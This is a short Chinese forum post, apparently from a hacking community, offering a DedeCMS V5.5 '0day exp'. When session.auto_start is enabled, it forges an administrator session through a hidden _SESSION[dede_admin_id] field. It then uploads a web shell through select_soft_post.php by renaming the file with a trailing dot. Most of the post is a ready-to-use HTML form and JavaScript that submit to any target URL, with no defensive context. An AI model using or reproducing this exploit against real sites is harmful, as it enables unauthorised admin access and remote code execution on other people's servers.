You are not logged in.
欢迎cnryan同学加入狼族:-)
在session.auto_start开启的情况下可以任意覆盖$_SESSION变量,我们可以伪造管理员登录并上传文件
/DedeCmsV55-GBK-Final/uploads/include/dialog/select_soft_post.php
上传时重命名为 *.php.
即可绕过检查上传shell
exp:
<form action="" method='POST' enctype="multipart/form-data">
U R L:<input type="text" name="target" size="50" value="http://192.168.1.110">
Path:<input type="text" name="path" value="/DedeCmsV55-GBK-Final/uploads/include/dialog/select_soft_post.php" size="90"><br>
File: <input type='file' name='uploadfile' size='25' />(Filetype must be GIF/JPEG etc)
RenameTo:<input type='test' name='newname' value="shell.asp."/><br>
<input type=hidden name="_SESSION[dede_admin_id]" value=1>
<input type=hidden name="bkurl" value=1>
<input type='button' value='submit' onclick="fsubmit()"/><br><br><br><br><br><br>
dedecms 0day exp..<br>
need: session.auto_start = 1<br>
By toby57 2010/2/22
</form>
<script>
function fsubmit(){
var form = document.forms[0];
form.action = form.target.value + form.path.value;
tmpstr = form.target.value +'/'+ form.newname.value;
form.bkurl.value = tmpstr.substr(0,tmpstr.length-1);
form.submit();
}
</script>
Offline